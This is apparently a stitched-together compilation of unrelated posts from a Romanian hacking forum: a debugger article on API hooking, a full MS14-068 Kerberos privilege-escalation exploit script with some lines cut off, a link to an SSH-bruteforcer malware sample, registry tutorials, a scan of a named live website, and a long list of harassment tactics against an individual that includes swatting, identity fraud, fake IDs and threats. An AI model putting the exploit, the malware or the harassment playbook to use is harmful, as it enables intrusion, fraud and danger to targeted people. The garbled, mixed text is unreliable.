Menus are drawn when pulled down and so they are reversed. The spacing is off. That is because of the kerning ExtTextOutW does behind the scenes. We really mess it up when we reverse the string – at least in some cases. Where to go next… Besides giving you a new practical joke to pull on a co-worker, this article demonstrates a few of the most powerful commands available to you through the debugger while using RevEngX. Probably the most powerful command, and the one I am most proud of, is the !callfn command. It will let you invoke any function in the target process, and it has access to a database of thousands of definitions that match those in the Windows SDK header files, to allow for a more natural looking call. You can use other commands such as !define to add new definitions to the database if you find that one you use often is missing. You can change definitions that might be wrong for your version of Windows. Database entries are persistent, and the database can be copied to new machines as needed. (Search for RevEngX.db in your home directory.) In addition to calling functions, there are many other commands available in RevEngX that will make your life as an Engineer, Reverse Engineer, or researcher easier! And there is more to come in future versions of RevEngX! One that I’ve started, but not had time to finish is a hex editor window that will allow you to define structure definitions based on regions of memory in the target process. The Hex Editor is done, I just need to finish up the new !dt command and some of the UI work for displaying structural elements with their respective data. This should be a powerful addition to the debugger for reverse engineers. Whatever the cause, just have fun and be responsible! Remember that no matter how clever you think you are, someone can always figure out what you did! As an example, when I reattach the debugger to our hooked calc.exe, and run RevEngX’s !iathooks command (see also !eathooks), I can quickly spot our hooks: 0:004> !iathooks IAT_ADDR EXPECTED ACTUAL SYMBOL IMPORTER 724d0544 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:WindowsSysWOW64UxTheme.dll 7113115c 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2COMCTL32.dll 6ed51168 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36gdiplus.dll 767d0254 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssystem32IMM32.DLL 75341078 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64LPK.dll 764e14a8 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64MSCTF.dll 75372158 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64SHELL32.dll 76b4123c 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64SHLWAPI.dll 75230258 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64USER32.dll 75181004 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64USP10.dll (Note that quick isn’t really accurate. Without any extra parameters !iathooks has to search *every* IAT entry to see if it has been hooked. Most processes have a lot of DLLs with a lot of entries, so be patient!) My hope is that this tool is an aid to the honest and the good, and that it simply will not appeal to those with ill intent! Source

A doua oara da Cancel la videoclipurile pe care deja le ai si astfel nu va mai pierde timpul cu cele pe care deja le ai. Apropo, se intampla sa se opreasca din descarcat la un moment dat si apare un screen cu ceva daca nu vrei "Unlock" adica sa le cumperi. Blochezi chestia aia cu adblock si pe urma nu se mai blocheaza acolo. Cum a zis si autorul: "ar fi ok sa tineti extensia pentru voi si sa nu o urcati pe net, pentru ca atunci metoda s-ar pierde" @FarSe Nu poti face ceva asemanator si pentru amazon ca sa descarci cartile gratis de acolo ? Sau macar pentru scribd... dar pe amazon sunt mult mai multe carti.

#!/usr/bin/python # MS14-068 Exploit # Author # ------ # Sylvain Monne # Contact : sylvain dot monne at solucom dot fr # http://twitter.com/bidord import sys, os from random import getrandbits from time import time, localtime, strftime from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5 from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \ decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \ AD_WIN2K_PAC from kek.pac import build_pac, pretty_print_pac from kek.util import epoch2gt, gt2epoch def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) sys.stderr.flush() nonce = getrandbits(31) current_time = time() as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(as_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) sys.stderr.flush() as_rep, as_rep_enc = decrypt_as_rep(data, user_key) session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) logon_time = gt2epoch(str(as_rep_enc['authtime'])) tgt_a = as_rep['ticket'] sys.stderr.write(' Done!\n') if krbtgt_a_key is not None: print >> sys.sdterr, as_rep.prettyPrint() print >> sys.stderr, as_rep_enc.prettyPrint() ticket_debug(tgt_a, krbtgt_a_key) sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(tgs_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) tgt_b = tgs_rep['ticket'] sys.stderr.write(' Done!\n') if trust_ab_key is not None: pretty_print_pac(pac[1]) print >> sys.stderr, tgs_rep.prettyPrint() print >> sys.stderr, tgs_rep_enc.prettyPrint() ticket_debug(tgt_b, trust_ab_key) if target_service is not None and target_host is not None and kdc_b is not None: sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_ sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, tgt_b, session_key2, subkey, nonce, current_time) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_ sys.stderr.flush() sock = send_req(tgs_req2, kdc_ sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_ sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_ tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) sys.stderr.write(' Done!\n') else: tgs_rep2 = tgs_rep tgs_rep_enc2 = tgs_rep_enc sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) cc = CCache((user_realm, user_name)) tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) cc.add_credential(tgs_cred) cc.save(output_filename) sys.stderr.write(' Done!\n') if target_key is not None: print >> sys.stderr, tgs_rep2.prettyPrint() print >> sys.stderr, tgs_rep_enc2.prettyPrint() ticket_debug(tgs_rep2['ticket'], target_key) # Pretty print full ticket content # Only possible in a lab environment when you already know krbtgt and/or service keys def ticket_debug(ticket, key): try: ticket_enc = decrypt_ticket_enc_part(ticket, key) print >> sys.stderr, ticket.prettyPrint() for ad in iter_authorization_data(ticket_enc['authorization-data']): print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type'] if ad['ad-type'] == AD_WIN2K_PAC: pretty_print_pac(str(ad['ad-data'])) else: print >> sys.stderr, str(ad['ad-data']).encode('hex') except Exception as e: print 'ERROR:', e if __name__ == '__main__': from getopt import getopt from getpass import getpass def usage_and_exit(): print >> sys.stderr, 'USAGE:' print >> sys.stderr, '%s -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>' % sys.argv[0] print >> sys.stderr, '' print >> sys.stderr, 'OPTIONS:' print >> sys.stderr, ' -p <clearPassword>' print >> sys.stderr, ' --rc4 <ntlmHash>' sys.exit(1) opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) opts = dict(opts) if not all(k in opts for k in ('-u', '-s', '-d')): usage_and_exit() user_name, user_realm = opts['-u'].split('@', 1) user_sid = opts['-s'] kdc_a = opts['-d'] if '--rc4' in opts: user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) assert len(user_key[1]) == 16 elif '-p' in opts: user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) else: user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest()) target_realm = user_realm target_service = target_host = kdc_b = None filename = 'TGT_%s@%s.ccache' % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename) Source

Nu postati toate site-urile de cacat la Show-Off. Ai folosit wpscan, dar nici macar nu ai fost in stare sa citesti ce a zis. Scrie clar ca versiunea la Contact Form 7 e 4.0.2 (adica ultima versiune) si mai jos zice ca 3.5.3 e vulnerabil, deci o pula. Si nu in ultimul rand, esti un cacat de om ca ai scanat site-ul unui membru RST, indiferent ce a facut / cine este acel membru.

Boss, pai ce faci, vii cu rezultatele unui scanner la show off?

Sper sa nu fi postat in rubrica gresita si sa va fie de ajutor(celor care vreti sa faceti reverse). E bruteforcer(SSH) din cate am putut sa-mi dau seama, se conecteaza la un C&C(cred ca nu e IRCD). Din pacate la momentul testarii, conectarea la C&C da timeout. Acelasi binar pentru mai multe procesoare - x32, x64,arm, mips,..... Link: https://www.sendspace.com/file/54jyoj

Exploring the Windows Registry Part 1 The Registry is a key component of the Windows operating system, and it's always been recommended that you should never careless run Registry Cleaners or start to change keys or delete keys which do not fully understand the purpose of. You never to seem to find much information about the Registry in general, unless it's in Specialist blogs or computer science papers. In this blog post I hope to show how to explore the Registry using WinDbg and look at some of the internal workings. The Registry tends to be referred less commonly as the Configuration Manager, and the Configuration Manager is the technical name for it. As the name suggests, the Configuration Manager mainly maintains the state of the configuration data for the operating system and any programs which may have been installed. The Registry is divided into several sections called Rootkeys. The Rootkeys are defined as follows: HKEY_LOCAL_MACHINE HKEY_CURRENT_CONFIG HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_PERFORMANCE_DATA HKEY_USERS Each Rootkey has a number of Hives which are subdivided into Keys and Values. This can be seen when viewing the Registry with the Registry Editor. Configuration Data), COMPONENTS, HARDWARE, SAM, SECURITY, SOFTWARE and SYSTEM. Any changes here will apply to the entire system. The HKEY_CURRENT_CONFIG contains information relating to Hardware Profiles, which enables configuration driver settings. A Hardware Profile may change from boot to boot, and will be used by any programs which require it. The HKEY_CLASSES_ROOT contains information for file extension associations, COM Class reregistration and UAC (User Account Control). The HKEY_CURRENT_USER contains the configuration data regarding the locally logged on user. The Root Key is mapped to the Ntuser.dat file which is present on the hard drive. Some of the local configuration data examples include: Environment Variables, Network Settings, Software Settings and Session Information. The HKEY_USERS contains data required each loaded user profile, and will be used by Winlogin to implement any specific user changes. This section will also contain keys relating to user security identifiers for that profile. The HKEY_PERFORMANCE_DATA contains operating system and server performance counters, and will not be visible through the Registry Editor. These performance counters are only available through the Windows Registry API. The HKEY is used to represent a handle to the rootkey. Now we have looked at the general logical structure of the Windows Registry, will need to examine it's actual implementation onto the hard disk. This is achieved through the concept of Hives, Cells and Bins. It is possible to be examine to parts of the Registry in Physical Memory. The structure of a Configuration Manager Hive can be seen with WinDbg using the _CMHIVE data structure. It's a large data structure, and therefore I have omitted some of the fields. The above data structure contains a larger sub structure called _HHIVE, which contains some very useful information. The _CMHIVE structure is allocated from paged pool, and has the pool tag of CM10. You can view this pool allocation information with !pooltag and !poolfin Using the !poolfind extension with the pooltag and specifying the pool type as paged pool with the 1 switch, we can see all the pool allocations for that specific pool tag A Hive is simply the on disk representation of the Registry, each one of these has it's own registry tree which serves as a root. The hives are then loads the Hives which can be found HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\hivelist. These Hives are stored on the hard disk, and are then linked to the Registry file paths as seen below. Most of the hives reside in the System32 folder, whereas, the others will reside in the UserProfiles and Users folder. Alternatively, we can view the Hivelist within WinDbg using the !reg hivelist extension. You may have noticed that the HARDWARE hive not does have a folder path, this is because it is updated every time the computer is booted, and therefore is only present within memory. We can even view the current paged pool consumption of the Registry Hives using the !reg dumppool extension. Again I've had to omit some information due to the size limitations. Using Process Explorer, and then selecting the System process, we can view the Hive Handles which are currently opened by the System Process. Going back to the general structure of how Hives are organized, Hives are linked together within a doubly linked list, the Head of this linked list can be found with WinDbg, the address is 8336e44c on x86, I'm sure if there is any difference on x64. We can also see this with the _CMHIVE structure and the HiveList field. The addresses within the linked list are all virtual addresses In the second part I have be taking a closer look at the structure of Hives and some more forensic analysis techniques. Source : BSODTutorials: Exploring the Windows Registry Part 1 Exploring the Windows Registry Part 2 Each Hive is divided into a number of allocation units called Blocks, the first block of a Hive is called the Base Block. The information which is stored within a Hive is then organized into Cells which contain active registry data such as keys, values, security descriptors and subkeys. The Hive Blocks are allocated in 4096 byte allocation sizes, and are called Hive Bins. The Base Block may also be referred to as the Registry Header, with the other blocks being called Hive Bins. Each Hive Bin is then divided further into Cells as explained above. A Hive Bin will have the hbin signature which can be found with WinDbg. Firstly, use the !reg hivelist extension, and then use the !reg viewlist extension with a desired Hive Address. The !reg viewlist extension will list the Mapped Views for the selected Hive. I wasn't able to find a dump file which had any mapped views, therefore I won't be able to show you the steps completely. Once you have used the !reg viewlist extension, then use the db command with a desired view to view the contents of a bin. The _HHIVE data structure seems to contain a Signature field and BaseBlock field as described earlier. Each Hive Bin contains a pointer to the next Hive Bin and the first Hive Bin. We can find free Hive Bins with the !reg freebins extension and the Hive address. These Hive Bins are only really containers for Cells which hold registry information such as keys, security descriptors, subkey lists and key values. There a few different types of Cells: Key Cell Value Cell Subkey-list Cell Value-list Cell Security-Descriptor Cell The Key Cell contains the registry key and may be called the Key Node. A Key Cell will contain the kn signature for Keys and kl for Link Nodes. Furthermore, the Key Cell will maintain timestamp information about the latest update to that key, and various Cell Indexes which will describe additional information. The Value Cell contains information about the key's value, and will have a Cell Index into what the cell which contains such data about the key. The signature will be kv. The Subkey-List Cell contains a list of Cell Indexes for Key Cells in which all share a common Parent Key. The Value-List Cell is the same as above, but applies to Value Cells rather than Key Cells. The Security Descriptor Cell will contain the ks signature and a reference count which maintains a count of the number of Key Nodes or Key Cells which share the Security Descriptor. This cell will contain a Security Descriptor. We can view Cell data structures with the _CM_CELL_DATA and then using the -r switch to dump all the hidden sub data structures. The -r switch is really useful for data structures in general, especially since Microsoft won't document some sub fields fully. Since we are the topic of keys, I thought it would be appropriate to look at the concept of Keys and how we can investigate into Keys further with WinDbg. We can firstly use the !reg openkeys extension, and then view any open keys. Please note that I've omitted the output of the extension to one Hive. However, we can gather more interesting information by looking into a few data structures. Each key will have a Key Control Block (KCB), we can use the _CM_KEY_CONTROL_BLOCK data structure to view the information about the open key. This is similar information to which can be found with the !reg kcb extension, you will need to use the !reg findkcb extension with the full registry path, in order to find the kcb address. However, with the open keys case, you can simply use the !reg kcb extension since the KCB address is already given. The Configuration Manager maintains open keys within a table for fast name lookups, the table can be found with two global variables called CmpCacheTable and CmpHashTableSize. The CmpCacheTable is a pointer to a hash table which explains the _CM_KEY_HASH data structure within the KCB. Each entry within the table is a pointer to the _CM_KEY_HASH data structure. The NextHash field points to the next structure within the table. Source: link Exploring the Windows Registery Part 3 Cells are containers for information, such as keys, thus the reason for the different type of cells explained in the last post. In order to make the logical structure of the registry clearer, it's important for me to state how all the different parts I've been discussing fit together to form one complete picture of the Windows Registry. Hives are split into Bins, and the Bins are then split into Cells. A Empty Bin will not contain any cells, whereas, a Bin with Cells will obviously contains Cells which will contain registry data. This brings around the point about Cell Indexes and Cell Mappings, and some of the data structures will can explore with WinDbg. Cell Indexes are essentially pointers which link cells from different hives together, to make easier and more efficient for the Configuration Manager to load information which it is searching for. More specifically, the Cell Index is a offset into the cell with the subtraction of the size of the base block for the selected hive. The tables which the Cell Indexes are used to index into, can be found within the Storage.Map member of the _DUAL data structure of the appropriate _HHIVE data structure. We can expand the _DUAL data structure and examine this member. The _HMAP_DIRECTORY is a array of pointers to table entries, which then contain the information for a specific Block and Bin. The FreeDisplay field is used to for free cells within memory. Since Hives are allocated from Paged Pool, they will need to be mapped since paged pool isn't guaranteed to be contiguous. This leads to the concept of Cell Index Mapping, which is very much the same as Virtual Address Translation on x86 systems; remember that x64 had a additional table of directory pointers. Using the diagram above, it may become more apparent what the pointers within the mentioned data structures are being used to index into. As we can see, the Directory Index pointer is being used to point to the Hive Cell Map Directory, which is then used to point to the Cell Map Table with a Table Index pointer, and then the Byte Offset is used to point to the specific Cell within the Hive Block. There is a additional bit which is either 0 or 1, and is used to determine if the Hive is Volatile or Stable, and which table type to begin searching with. This translation is used for Hives in memory. 1 is Volatile and 0 is Stable. Directory Index = 10 bits Table Index = 9 bits Byte Offset = 12 bits Since Hives usually reside on the hard disk, and are then mapped into memory, in order to avoid excessive consumption of the Cache Manager's address space. The number of mapped views for a hive is limited to 256 views. The LRU (Least Recently Used) views list is consulted when this has been reached, and when a new mapping is required because the Configuration Manager requires a hive to be mapped into memory. The LRU mapping will be removed from the list. This data structure is allocated with Paged Pool. There is some interesting WinDbg extensions we can use to find additional information related to Cell Indexes such as the !reg cellindex extension. The extension shows the virtual address associated with the Cell Index. The first address is the Hive Address and the 40 is the offset which we are looking for. I've used the SYSTEM hive in this example. Source: link

Intra pe un tutorial free si dai play,daca se icnarca in continuu: 1. Sterge Cookies 2. Da restart la rooter 3. Da restart la pc.

Putem lua pe rand fiecare informatie si ulterior sa gasim informatii noi pe baza acestora. 1. Numele complet In cazul in care este o persoana activa social sunt sanse foarte ridicate de a-i afla contul de Facebook. De aici exista mai multi vectori de atac: 1. Social engineering: creare unui cont aparent benign, crearea unei legaturi cu persoana respectiva, acumularea de informatii despre viata personala 2. Social forensics: folosirea de site-uri precum tineye.com pentru a gasi toate referintele care contin informatii privitoare imaginilor publice pe care le detine 3. Atacuri indirecte: atacarea membrilor de familie sau a colegilor de lucru a respectivei persoane 4. Atacuri de incriminare: apelarea la echipe de interventie speciale(SMURD, politie) folosind numele real al respectivei persoane. Este suficient sa stim orasul in care are domiciliul(cunoastem IP-ul) pentru a ne deplasa efectiv acolo sau prin apelare VoIP(de ex Skype) pentru a instiinta organele statului. 5. Profanare: in lumea neo-liberala in care traim ne putem folosi de curente politice pentru a ne indeplini telul: orice mesaje incorecte d.p.d.v. politic(rasism, sexism, xenofobie) pot angrena corpuri mediatice care la randul lor vor ruina viata respectivei persoane, cel putin din punct de vedere profesional. Actiunile acestea pot include jignirea unui grup de minoritati, desenarea unor simboluri naztionaliste(nu vrem sa fie indexata pagina) pe locurile de odihna a celora cu origini semitice, etc. 6. Asocieri nedorite: deschiderea a numeroase conturi folosind respectivul nume pe diverse site-uri pentru adulti(imaginea persoanei respective va avea de suferit cand paginile pe care apare vor fi indexate). 7. Comportament anti social: prezentarea unui individ ca fiind persoana in cauza si afisarea unui comportament neconstructiv(furt, injurii, deranjarea ordinii publice, etc.). 8. Amenintarea unor membrii din lumea interlopa(nu recomand acest lucru incepatorilor) sub numele respectiv. Este usor sa pornesti o discutie iar ulterior sa o deviezi intr-o directie care poate deranja interlocutorul(amenintari, intimidare, santaj). Dupa un timp acestia vor lua masuri ... 9. Atacuri psihologice: este relativ usor sa gasim un numar de telefon pornind de la un nume complet(pe vremuri aveam Pagini Aurii). Putem ulterior ameninta persoana respectiva prin dialog-uri neadecvate(injurii, cuvinte obscene, amenintari) la ore tarzii(intre 03:00 si 05:00 dimineata mai ales in zilele lucratoare) folosind cartele prepaid. 10. Atacuri la imaginea personala: crearea unor blog-uri cu continut pentru adulti folosind respectivul nume. 2. Cod numeric personal * Toate cele de mai sus la care se adauga: 1. Presupunand ca avem si numele real putem crea un buletin fals. Putem crea tensiuni in comunitate vandalism, deranj public. Vom furniza respectivul buletin o data ce autoritatile au luat masuri(optiunea cercetat in libertate este preferata in zilele noastre). 2. Putem incerca parole pe diverse site-uri sociale folosind subsiruri ale CNP-ului. Daca avem noroc putem strica imaginea respectivei persoane foarte usor: cerem cate 2$ pe paypal tuturor contactelor. In cazul in care nu primim banii putem recurge la injurii si amenintari. Astfel de manifestari mai mult ca sigur vor deteriora relatiile celui/celeia in cauza. 3. Serie si numar buletin * Toate cele de mai sus si: 1. Putem "lua credit doar cu buletinul". Sincer nu stiu daca mai ofera vreo banca acest "beneficiu" insa se pot crea pagube semnificative in cazul in care este posibil. Doar numele, prenumele si CNP-ul sunt informatiile relevante de pe buletine cel putin la noi. Daca persoana nu returneaza valoarea imprumutata plus dobanda exista sanse destul de ridicate ca toate conturile bancare sa ii fie inchise/inghetate. Mai mult nu mai poate deschide altele noi. 2. Crearea mai multor buletine identice si distribuirea acestora intr-o comunitate de rromi care doresc sa emigreze 4. Adresa de acasa Considerand ca avem la dispozitie si datele de mai sus putem face urmatoarele: 1. Comandarea a nenumarate produse folosind teleshopping. Cu multa vreme in urma in fiecare sambata si duminica la orele diminietii se difuzau astfel de emisiuni. Ideea este sa comanzi cat mai multe produse(nu conteaza natura acestora) Este de dorit totusi ca acestea sa fie voluminoase(scaune, mobilier(pat, canapea, coltar, fotolii), electrocasnice(frigidere, masini de spalat, etc.) pentru a determina un cost cat mai ridicat al transportului. 2. Tactici de intimidare: deranjarea la ore indecente 3. Amenintarea unor grupuri interlope(din nou, nu recomand acest lucru incepatorilor) si dupa un timp furnizarea adresei catre acestea. 4. Atentionarea institutiilor statului: apeluri la politie la ore tarzii. Astfel, s-ar putea trezi cu mascatii la usa la 03:00 dimineata. 5. Scoaterea casei la vanzare; crearea unor documente false care sa ateste faptul ca domiciliul apartine atacatorului. Prezentarea acesteia la o ora/data la care proprietarul nu este acasa(este foarte probabil sa fie necesar un lacatus in acest punct). 6. Avertizari din partea primariei(am facut o astfel de pozna cand eram copil): lipirea unui document care sa para oficial si care sa solicite platirea unei amenzi pana la o anumita data. Optional atacatorul poate plimba victima prin oras, la institutiile statului mai exact. Un scenariu ar putea fi urmatorul: reinnoirea actelor de proprietate conform unei noi legi care tocmai a intrat in vigoare(presupune cateva drumuri la primarie, prefectura), contactarea furnizorului de gaz pentru a solicita o verificare a sistemului de incalzire(presupune cel putin un drum plus costuri aferente), platirea unor amenzi pentru deranj public, conditii insalubre, etc.. S-ar putea deschide chiar si un ghiseu intr-o cladire inchiriata, si astfel sa se adune bani(sigur se gaseste cineva care sa plateasca). 7. Crearea unei dispute cu vecinii: crearea unor pagube si lasarea numelui adevarat pe proprietatea acestora si invers(numele vecinilor sunt relativ usor de aflat). Mai mult ca sigur se vor crea tensiuni in special daca acestea sunt deja prezente insa intr-o forma mai blanda. 8. Aceasta este cam triviala insa merita mentionata: sudarea usii de la intrare(stati putin si ganditi-va la starea pe care a-ti avea-o daca vi s-ar intampla acest lucru intr-o zi lucratoare). 9. In cazul in care victima pleaca in concediu, sa zicem pentru doua saptamani, iar domiciliul ramane vacant se pot deschide toate robinetele si se pot porni toate aparetele electrocasnice. Se pot inchide inainte ca proprietarii sa se intoarca. 5. Adresa de mail 1. Scrierea acesteia pe un numar de site-uri publice(vor fi prinse de crawler-e devenind mai mult ca sigur destinatii pentru spam) 2. Abonarea la diverse newsletter-uri(extrem de enervant intrucat nu sunt recunoscute ca si spam) 3. Un cont de e-mail este usor de compromis o data ce suficiente date personale sunt cunoscute atacatorului 6. Adresa IP 1. Se pot face DNS amplification attacks cu IP-ul respectiv ca si sursa. Spre deosebire de flood acesta/clasa acestuia va fi blacklisted de unele companii de hosting 2. Port scan, flood. 3. Putem determina si orele la care persoana este activa, cand merge la lucru, cat timp sta la lucru, etc.. 7. Cont IBAN 1. Daca avem toate informatiile de mai sus putem inchide contul 2. Putem transfera bani intr-alt cont 8. Cont Paypal 1. Se poate bloca dupa mai multe tranzactii cu sume mari(putem lua credit doar cu buletinul).

))))))))))))))) prea tare asta, e prea inganfat acest tinkode merita asa ceva !

L-am cumparat. Isi face treaba. Merita. +1

Am reusit sa ajung si eu la zi cu posturile, dar am ramas un pic blocat pe juncture.ro de la @siur eu personal, in locul tau, as face un update si as verifica htaccess + file permision. [+] URL: http://juncture.ro/ [+] robots.txt available under: 'http://juncture.ro/robots.txt' [!] The WordPress 'http://juncture.ro/readme.html' file exists [!] Full Path Disclosure (FPD) in: 'http://juncture.ro/wp-includes/rss-functions.php' [+] Interesting header: SERVER: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 [+] XML-RPC Interface available under: http://juncture.ro/xmlrpc.php [+] WordPress version 4.0.1 identified from meta generator [+] WordPress theme in use: figero - v1.5.3 [+] Name: figero - v1.5.3 | Location: http://juncture.ro/wp-content/themes/figero/ | Readme: http://juncture.ro/wp-content/themes/figero/readme.txt | Changelog: http://juncture.ro/wp-content/themes/figero/changelog.txt | Style URL: http://juncture.ro/wp-content/themes/figero/style.css | Theme Name: Figero | Theme URI: http://www.inkthemes.com/figero-wordpress-org/ | Description: Figero is a great Theme to build your business or services related website with ease. The Theme c... | Author: InkThemes.com | Author URI: http://www.inkthemes.com/ [+] Enumerating plugins from passive detection ... | 2 plugins found: [+] Name: contact-form-7 - v4.0.2 | Location: http://juncture.ro/wp-content/plugins/contact-form-7/ | Readme: http://juncture.ro/wp-content/plugins/contact-form-7/readme.txt [!] Directory listing is enabled: http://juncture.ro/wp-content/plugins/contact-form-7/ [!] Title: Contact Form 7 & Old WP Versions - Crafted File Extension Upload Remote Code Execution Reference: http://packetstormsecurity.com/files/125018/ Reference: http://seclists.org/fulldisclosure/2014/Feb/0 Reference: http://osvdb.org/102776 [+] Name: w3-total-cache - v0.9.4 | Location: http://juncture.ro/wp-content/plugins/w3-total-cache/ | Readme: http://juncture.ro/wp-content/plugins/w3-total-cache/readme.txt | Changelog: http://juncture.ro/wp-content/plugins/w3-total-cache/changelog.txt [+] Memory used: 2.656 MB

Am inteles ca este interzis in a face mentionare la "lucruri intereseante care nu se fac in propiul network" cu legaturi guvernamentale, dar as vrea sa precizez faptul ca websiteul lui Vic Monta are path disclosure !